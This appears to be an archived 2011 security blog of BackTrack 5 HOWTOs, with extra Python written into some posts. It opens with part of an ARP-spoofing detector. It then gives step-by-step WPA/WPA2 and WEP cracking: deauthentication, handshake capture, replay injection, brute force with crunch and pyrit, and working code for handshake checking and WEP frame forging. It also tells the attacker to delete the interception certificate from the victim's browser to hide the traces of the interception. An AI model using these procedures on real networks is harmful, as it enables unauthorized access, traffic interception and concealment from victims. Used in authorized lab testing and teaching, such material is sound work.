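    ip_to_mac: dict = field(default_factory=dict)
    mac_to_ips: dict = field(default_factory=dict)
    alerts: list = field(default_factory=list)

    def observe(self, r: ArpReply) -> list:
        """Record one reply; return the alerts it triggered (possibly none)."""
        new = []
        mac = r.mac.upper()
        prev = self.ip_to_mac.get(r.ip)
        if prev is not None and prev != mac:
            # A changed (and later flapping) IP->MAC binding is the poisoning signature.
            new.append(f"t={r.ts:.0f} ip {r.ip} moved {prev} -> {mac}")
        self.ip_to_mac[r.ip] = mac
        ips = self.mac_to_ips.setdefault(mac, set())
        if r.ip not in ips:
            ips.add(r.ip)
            if len(ips) > 1:
                # One station answering for several IPs is impersonating them.
                new.append(f"t={r.ts:.0f} mac {mac} now claims {sorted(ips)}")
        self.alerts.extend(new)
        return new


def analyze(trace) -> list:
    """Run a whole trace through a fresh monitor and return all alerts."""
    mon = ArpMonitor()
    for reply in trace:
        mon.observe(reply)
    return mon.alerts


def gateway_pinned(mon: ArpMonitor, gw_ip: str, gw_mac: str) -> bool:
    """Does the table still hold the known gateway MAC? On a host the
    equivalent mitigation is a static ARP entry for the gateway."""
    return mon.ip_to_mac.get(gw_ip) == gw_mac.upper()


# Constructed trace using the addresses from the ettercap output above.
SAMPLE_TRACE = [
    ArpReply(0, "192.168.1.1", "00:1E:10:FF:A7:E2"),     # real router
    ArpReply(1, "192.168.1.100", "70:1A:04:FF:0A:9A"),   # victim
    ArpReply(2, "192.168.1.115", "08:00:27:FF:95:DB"),   # attacker, own IP
    ArpReply(60, "192.168.1.1", "08:00:27:FF:95:DB"),    # forged: gateway IP
    ArpReply(61, "192.168.1.100", "08:00:27:FF:95:DB"),  # forged: victim IP
    ArpReply(70, "192.168.1.1", "00:1E:10:FF:A7:E2"),    # router answers again
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_TRACE):
        print("ALERT", line)
```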

Remarks :

To delete the untrusted certificate in Firefox on the victim's machine : "Edit" -- "Preferences" -- "View Certificate List" -- "Server". You will find something like the following. Just delete them all.

Thawte Consulting (Pty) Ltd.
www.google.com www.google.com:443 forever 2011-09-21
www.google.com mail.google.com:443 forever 2011-09-21


In general, GMail will not ask you to accept any certificate, especially an untrusted one, so an unexpected certificate warning on a site that never shows one is itself the sign that the connection is being intercepted.

That's all! See you.

Thursday, May 26, 2011

HOWTO : Back|Track 5 on VirtualBox 4.0.8

(A) Install Back|Track 5 on VirtualBox

Install VirtualBox 4.0.8 on the host computer (such as Ubuntu 11.04) as usual. Then install Back|Track 5 in VirtualBox. Next, install the Oracle VM VirtualBox Extension Pack and the Guest Additions.

The Oracle VM VirtualBox Extension Pack is installed on the host computer (such as Ubuntu 11.04). You can find it on the Download page.

To install the Guest Additions, just click "Devices" -- "Install Guest Additions" on the menu.

Do the following on the guest computer (Back|Track 5) :

cd /media/VBOXADDITIONS_4.0.8_71778
./VBoxLinuxAdditions.run


To fix the boot-up screen :

fix-splash

Do the following on the host computer (Ubuntu 11.04) :

Add your username to the vboxusers group, e.g. with samiux as the username :

sudo usermod -aG vboxusers samiux

Go to "Users and Groups", "Advanced Settings" -- "User's Rights" select "Use VirtualBox solution".

Then reboot your host for the change to take effect.

Remember not to enable USB 2.0 in VirtualBox, as some USB dongles do not work properly when it is enabled.

Finally, the following wireless USB dongles have been tested and they all work perfectly out of the box. They all support injection too.

TP-Link TL-WN321G 54Mbps Wireless G USB Adapter
TP-Link TL-WN821N 300Mbps Wireless N USB Adapter
TP-Link TL-WN822N 300Mbps High Gain Wireless N USB Adapter


*** This tutorial also applies to VirtualBox 4.1.2.

Remarks :

When the Back|Track 5 kernel is upgraded, the Guest Additions will break. Run the following on Back|Track 5 and then reinstall the Guest Additions :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


(B) Create Metasploitable virtual machine (Optional)

Go to the following link to download "Metasploitable", which is an Ubuntu 8.04 server with some deliberate flaws.

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Set the downloaded Metasploitable image as the virtual hard drive in VirtualBox. Set the network adapter to "Host-Only". Give Metasploitable at least 8GB of virtual hard disk space and 512MB of RAM.

(C) The VirtualBox intranet

Now the IP address of eth0 on Metasploitable will be something like 192.168.56.101. The IP addresses of eth0 and eth1 on Back|Track will be something like 10.0.2.15 and 192.168.56.102 respectively.

You may need to execute the following command on Back|Track in order to see both network interfaces and their IPs.

/etc/init.d/networking restart

Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.

Your penetration testing environment is now set up.

(D) Free Tutorials

(1) Metasploit Unleashed
(2) Fast-Track
(3) Social-Engineer Toolkit
(4) Got Milk?
(5) How to Metasploit Beginner to Advanced (Video)
(6) SecurityTube.net (Video)
(7) BackTrack WiKi

(E) Non-free Training

Offensive Security

(F) Resources

(1) Exploits Database
(2) Metasploit Blog
(3) Offensive security Blog
(4) Yet another Back|Track in Gnome
(5) Metasploit
(6) Google Hacking-Database
(7) BackBox Linux

You may find the following links useful :

HOWTO : Bug fix for Back|Track 5

HOWTO : WEP cracking with Back|Track 5

HOWTO : WPA/WPA2 cracking with Back|Track 5

HOWTO : No skill hacking with Armitage on Back|Track 4 R2

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : The Onion Router (Tor) on Back|Track 5

HOWTO : FeedingBottle 3.2 on Back|Track 5

HOWTO : Update script for Back|Track 5

HOWTO : Yet Another Update script for Back|Track 5

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

HOWTO : Adobe Flash 10.3 on Back|Track 5

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

Does Snort really protect your network?

HOWTO : Solves the Wireshark not loading on Back|Track 5

HOWTO : Register to OSVDB and Nessus on Back|Track 5

HOWTO : Anonymous in chat.freenode.net with XChat

HOWTO : Pure-ftpd and atftpd on Back|Track 5

HOWTO : SSH Tunneling - Remote Port Forwarding

HOWTO : Penetration Testing in the Real World

g0tmi1k's Video Series

That's all! See you.

Sunday, May 22, 2011

HOWTO : WPA/WPA2 cracking with Back|Track 5

Do not attack any wifi router without authorization; otherwise you may end up in jail.

(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to stop the program once you have noted the target's BSSID, channel (CH) and a connected client (STATION).

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the prefix of the capture file
           --bssid is the BSSID of the target access point (ff:ff:ff:ff:ff:ff is a placeholder; use the value from Step 4)
           --ivs keeps the capture small (IVs and the handshake only, not full frames); omit it if you also want a full .cap for pyrit or Wireshark

Leave this terminal running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -0 1 sends one deauthentication burst
           -a is the BSSID
           -c is the MAC address of a connected client (STATION)

The deauthenticated client reconnects, and airodump-ng records the four-way handshake. Wait until the top line of the airodump-ng terminal shows "WPA handshake:" followed by the BSSID.

Step 7 :

Use the John the Ripper word list to crack the WPA/WPA2 passphrase. Entries shorter than 8 characters are skipped, since a WPA passphrase is 8 to 63 characters long.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use the John the Ripper word list, you can generate candidates on the fly with Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the password length, i.e. from 8 to 16 characters. See the remarks at the end of this post before using such a wide range with this charset.

(B) nVidia Display Card with CUDA

If you have an nVidia card with CUDA support, you can use pyrit, fed by crunch, to crack the passphrase on the GPU.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "Ctrl+c" to stop the program once you have noted the target's BSSID, channel (CH) and a connected client (STATION).

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -0 1 sends one deauthentication burst
           -a is the BSSID
           -c is the MAC address of a connected client (STATION)

The deauthenticated client reconnects, and airodump-ng records the four-way handshake. Wait until the top line of the airodump-ng terminal shows "WPA handshake:" followed by the BSSID.

Step g :

Install the following packages if they are not already present :

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing). cpyrit-cuda needs the nVidia CUDA toolkit (nvcc) installed before it will build.

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the password length, i.e. from 8 to 16 characters
           -i - reads the candidates from stdin (the crunch pipe)
           --all-handshakes tests every handshake found in the capture rather than only the first

Step k (Optional) :

If pyrit reports an error while reading wpacrack-01.cap, strip the capture down to what it needs first and attack the stripped file instead.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the password length, i.e. from 8 to 16 characters, as in Step j.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.
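What one "PMK" in that counter costs, and how each candidate is checked against the captured handshake, shown as a Python example added here (it is not part of the original post, of aircrack-ng or of pyrit). It applies equally to the aircrack-ng run in part (A) and the pyrit run in part (B): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), PTK = PRF-512 over both MAC addresses and both nonces, and the MIC of handshake message 2 decides whether the candidate is right. The SSID, MAC addresses, nonces and the EAPOL frame are constructed for the example; the algorithms are the standard 802.11i ones. The crunch_like() and keyspace() helpers are assumptions that play the role of the crunch pipe.

```python
import hashlib
import hmac
import itertools

# Constructed lab handshake parameters (assumptions, not from any real capture).
SSID = "lab-ssid"
AP_MAC = bytes.fromhex("001122334455")   # BSSID, the -a / --bssid value above
STA_MAC = bytes.fromhex("66778899aabb")  # client (STATION), the -c value above
ANONCE = bytes(range(32))                # nonce from handshake message 1
SNONCE = bytes(range(32, 64))            # nonce from handshake message 2
# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay ctr(8)
# + nonce(32) + key IV(16) + RSC(8) + key ID(8) = offset of the 16-byte MIC
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the cost per candidate; this is one 'PMK' in
    the pyrit counter and the work the GPU is doing."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 (IEEE 802.11i): PTK from PMK, both MACs and both nonces.
    Only the first 16 bytes (the KCK) are needed to verify the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck, eapol_frame, wpa2=True):
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-SHA1 truncated to 16 bytes for WPA2 (CCMP), HMAC-MD5 for WPA (TKIP)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if wpa2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, zeroed, hashlib.md5).digest()


def build_message2(snonce):
    """Minimal EAPOL-Key message 2 (constructed), MIC field still zero."""
    f = bytearray(99)
    f[0:4] = b"\x01\x03\x00\x5f"      # EAPOL v1, type Key, body length 95
    f[4] = 0x02                        # descriptor type: RSN
    f[5:7] = b"\x01\x0a"               # key info: HMAC-SHA1-AES, pairwise, MIC set
    f[7:9] = b"\x00\x10"               # key length 16
    f[9:17] = b"\x00" * 7 + b"\x01"    # replay counter
    f[17:49] = snonce
    return bytes(f)                    # IV/RSC/ID/MIC/key-data-length stay zero


def capture_handshake(true_passphrase):
    """What the attacker sees on the air: message 2 carrying the MIC the real
    client computed from the real passphrase. Constructed for this example."""
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_message2(SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]


def check_candidate(candidate, eapol_frame):
    """One cracking step: PMK -> PTK -> MIC, compared with the captured MIC."""
    pmk = pmk_from_passphrase(candidate, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return hmac.compare_digest(eapol_mic(ptk[:16], eapol_frame),
                               eapol_frame[MIC_OFFSET:MIC_OFFSET + 16])


def attack_passthrough(candidates, eapol_frame):
    """Equivalent of `crunch ... | aircrack-ng -w -` or `pyrit -i - attack_passthrough`:
    read candidates from any iterator; WPA passphrases are 8..63 characters, so
    shorter or longer words (many entries of password.lst) are skipped unhashed.
    Returns (passphrase or None, number of candidates actually hashed)."""
    tried = 0
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue
        tried += 1
        if check_candidate(cand, eapol_frame):
            return cand, tried
    return None, tried


def crunch_like(min_len, max_len, charset):
    """Generator playing the role of `crunch min max` over a charset (assumption)."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def keyspace(min_len, max_len, charset_size):
    """Number of candidates crunch would emit; divide by PMKs/s for the run time."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


if __name__ == "__main__":
    handshake = capture_handshake("lab-passphrase-2011")
    print(attack_passthrough(["123456", "password", "lab-passphrase-2011"], handshake))
    print(attack_passthrough(crunch_like(8, 8, "ab"), handshake))   # 256 candidates, no hit
    years = keyspace(8, 16, 95) / 17000 / (3600 * 24 * 365)
    print(f"8..16 chars over 95 symbols at 17000 PMK/s: about {years:.3g} years")
```

The PBKDF2 step is the entire cost; nothing in the handshake changes per candidate, so PMKs pre-computed for a known SSID (what pyrit's batch mode does) turn each check into a handful of HMACs, while a new SSID invalidates all of that work.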


Remarks :

With an nVidia GeForce GTX460 (336 CUDA cores), the cracking speed is about 17,000 PMKs (candidate passphrases) per second. Divide the crunch keyspace by this figure before you start: 95 symbols over eight characters alone give 95^8, about 6.6 x 10^15 candidates, which is more than ten thousand years at that rate, and the 8-16 range used above is far larger. Restrict the charset and length, or use a crunch pattern (-t), to what you actually know about the target passphrase.

To test whether your wireless card (USB or PCI-e) can inject :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

It should report "Injection is working!".

Check that pyrit detects your CUDA cores :

pyrit list_cores

That's all! See you.

HOWTO : WEP cracking with Back|Track 5

Do not attack any wifi router without authorization; otherwise you may end up in jail.

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 :

airodump-ng mon0

Press "Ctrl+c" to stop the program once you have noted the target's BSSID and channel (CH).

Step 4 :

airodump-ng -c 6 -w wepcrack --bssid 99:88:77:66:55:44 mon0

*where -c is the channel
            -w is the prefix of the capture file
            --bssid is the BSSID of the target access point (99:88:77:66:55:44 is a placeholder; use the value from Step 3)

Step 5 :

open another terminal.

aireplay-ng -1 0 -a 99:88:77:66:55:44 mon0

*where -1 is fake authentication (0 = a single attempt)
            -a is BSSID

aireplay-ng should end with "Association successful :-)". If it does not (for instance because the AP filters client MAC addresses), the replayed frames in the next step will not be accepted.

Step 6 :

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 99:88:77:66:55:44 mon0

*where -2 is interactive frame replay
            -p 0841 sets the frame control field (To-DS and WEP bits) so that the AP accepts the replayed data frame and relays it back out with a fresh IV
            -c is the destination MAC address (ff:ff:ff:ff:ff:ff = broadcast, so the AP relays it to everyone)
            -b is BSSID

When asked "Use this packet ?", answer "y". The #Data counter in the airodump-ng terminal should now climb quickly; each relayed frame is one more IV for aircrack-ng.

Step 7 :

open another terminal.

aircrack-ng wepcrack*.cap

aircrack-ng retries automatically as the capture grows; with the PTW attack a 64-bit key usually falls after a few tens of thousands of IVs, a 128-bit key needs more.
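Why the replayed frames in Step 6 are accepted and why each one is worth an IV, as a Python example added here (it is not part of the original post or of aircrack-ng). It implements WEP encapsulation the way an access point does it, RC4 keyed with IV || secret key and a CRC-32 ICV, and shows three things: the AP relays a replayed frame under a fresh IV because WEP has no replay protection, a frame with known plaintext (such as the LLC/SNAP header every ARP frame starts with) leaks the keystream for its IV, and with that keystream a new frame with a valid ICV can be forged without the key. The last step goes slightly beyond the post's interactive replay; it is what the fragmentation and chopchop modes of aireplay-ng build on. The key, IVs and payloads are constructed for the example.

```python
import struct
import zlib

# Constructed values (assumptions for the example, not from any real network).
SECRET_KEY = bytes.fromhex("0102030405")        # 40-bit key of a "64-bit" WEP network
SNAP_ARP = bytes.fromhex("aaaa030000000806")    # LLC/SNAP header of every ARP frame
IV_SPACE = 2 ** 24                              # a 3-byte IV has only this many values


def rc4_keystream(key, length):
    """Plain RC4: key scheduling, then `length` output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext):
    """WEP integrity value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key, iv, plaintext):
    """Frame body on the air: IV(3) || key-id(1) || RC4_{IV||key}(plaintext || ICV).
    The IV travels in clear; the per-frame RC4 key is simply IV || secret key."""
    keystream = rc4_keystream(iv + secret_key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(secret_key, frame):
    """What the AP does on receive: decrypt, check the ICV, return plaintext or None."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4_keystream(iv + secret_key, len(body)))
    plaintext, received_icv = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == received_icv else None


def ap_relay(secret_key, frame, next_iv):
    """The behaviour `aireplay-ng -2 -p 0841` exploits: a replayed frame is
    accepted (WEP keeps no replay counter) and sent out again under a fresh IV,
    so every replay hands the attacker one more encrypted sample."""
    plaintext = wep_decrypt(secret_key, frame)
    if plaintext is None:
        return None
    return wep_encrypt(secret_key, next_iv, plaintext)


def recover_keystream(frame, known_bytes):
    """Attacker side, no key needed: the bytes of (plaintext || ICV) that are
    known, XORed with the ciphertext, are keystream bytes for this IV."""
    return xor(frame[4:], known_bytes)


def forge_frame(iv, keystream, new_plaintext):
    """Attacker side: with keystream for an IV, a fresh frame with a valid ICV
    can be built without the key (keystream reuse)."""
    data = new_plaintext + icv(new_plaintext)
    if len(keystream) < len(data):
        raise ValueError("not enough recovered keystream for this payload")
    return iv + b"\x00" + xor(data, keystream)


if __name__ == "__main__":
    arp = SNAP_ARP + b"constructed ARP request body"
    frame = wep_encrypt(SECRET_KEY, b"\x00\x01\x02", arp)
    relayed = ap_relay(SECRET_KEY, frame, b"\x00\x01\x03")
    print("relayed under IV", relayed[:3].hex(), "same plaintext:",
          wep_decrypt(SECRET_KEY, relayed) == arp)
    ks = recover_keystream(frame, arp + icv(arp))
    forged = forge_frame(frame[:3], ks, b"X" * len(arp))
    print("forged frame accepted by AP:", wep_decrypt(SECRET_KEY, forged) == b"X" * len(arp))
    print("distinct IVs available before reuse is forced:", IV_SPACE)
```

aircrack-ng itself does not rely on keystream reuse to recover the key: it feeds the IVs and the first keystream bytes of each frame (predictable, because the SNAP header is known) into its PTW and Korek statistical attacks, which is why the #Data counter, not the elapsed time, is what matters in Step 7.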

That's all! See you.

Saturday, May 21, 2011

HOWTO : Bug fix for Back|Track 5

BackTrack 5 is a penetration testing distribution released on May 10, 2011. It comes with Gnome or KDE and in 32-bit, 64-bit and ARM versions.

The following solutions are summarized from BackTrack 5 forum as at May 21, 2011 (GMT +8).

Bug #1 : Quick fix for scan modules not working in Armitage

cd /pentest/exploits/framework3/external/pcaprub/
ruby extconf.rb
make
make install


Bug #2 : Gnome - waiting for audio system to respond

mkdir -p ~/.config/autostart
nano ~/.config/autostart/pulseaudio.desktop


[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio


Bug #3 : Where is Fast-track on 64-bit system?

svn co http://svn.secmaniac.com/fasttrack fasttrack/
cd fasttrack
python setup.py install
mv ~/fasttrack/ /pentest/exploits/


Answer "yes" when prompted during the above commands.

Bug #4 : Fix error when building nvidia-current

nano /usr/src/nvidia-current-195.36.24/nv.c

Change from :
.ioctl = nv_kern_ioctl,

To :
.unlocked_ioctl = nv_kern_unlocked_ioctl,

apt-get update
apt-get upgrade
apt-get install nvidia-current


If that fails, try the following :

dkms build -m nvidia-current -v 195.36.24
dkms install -m nvidia-current -v 195.36.24
modprobe nvidia-current


Bug #5 : White screen of death (ATi display card)

nano /etc/default/grub

Change from :
GRUB_CMDLINE_LINUX_DEFAULT="text splash"

To :
GRUB_CMDLINE_LINUX_DEFAULT="text splash radeon.modeset=0"

Bug #6 : airdrop-ng and pylorcon

apt-get install python-dev

Bug #7 : xgps on 64-bit system

Go to the following link :
http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/index.php#SWT

Download "Linux (x86_64/GTK 2)", version is 3.5.2 at the time of this writing :

http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/download.php?dropFile=swt-3.5.2-gtk-linux-x86_64.zip

unzip swt-3.5.2-gtk-linux-x86_64.zip
cp swt.jar /usr/share/xgpsmanager


Bug #8 : Gnome - Ettercap-gtk crashes while scanning for hosts

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-bugs/40556-ettercap-gtk-crashes-while-scanning-hosts.html

Bug #9 : SET configuration bug

cd /pentest/exploits/set/config
nano set_config


Change from :
DNSSPOOF_PATH=/usr/sbin/dnsspoof

To :
DNSSPOOF_PATH=/usr/sbin/local/dnsspoof

and

Change from :
AIRBASE_NG_PATH=/pentest/wireless/aircrack-ng/src/airbase-ng

To :
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng

Confirm the real locations of dnsspoof and airbase-ng on your own installation (the which command will tell you) before editing; SET only works with paths that actually exist.

Bug #10 : Teensy/SET

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-fixes/40484-bt5-kde-64bit-teensy-s-e-t.html

Remarks :

BackTrack 5 site

BackTrack 5 Download

BackTrack 5 wiki

BackTrack Forum

That's all! See you.

Wednesday, May 18, 2011

HOWTO : Octoshape on Ubuntu 11.04 Desktop

When listening to RTHK's online radio at http://www.rthk.org.hk, you may notice an "HQ" button. It activates a third-party plugin named Octoshape, which delivers high quality video and audio streaming. Here is how to get it working on Ubuntu 11.04.

Step 1 :

Install the plugin. The same commands work on both 32-bit and 64-bit systems; the plugin is installed into your home directory. Note that the installer is fetched over plain HTTP and executed as-is, so nothing here checks the integrity of what you run.

wget http://www.octoshape.com/files/octosetup-linux_i386.bin
chmod +x octosetup-linux_i386.bin
./octosetup-linux_i386.bin


Step 2 :

Keep the client running in a terminal (the commands below) whenever you play back HQ video or audio.

cd octoshape
./OctoshapeClient


Step 3 :

Open Firefox, go to RTHK and select an online programme by clicking its "HQ" button, with the Octoshape client still running as in Step 2.

Now, you can enjoy the HQ video and / or audio on the website.

That's all! See you.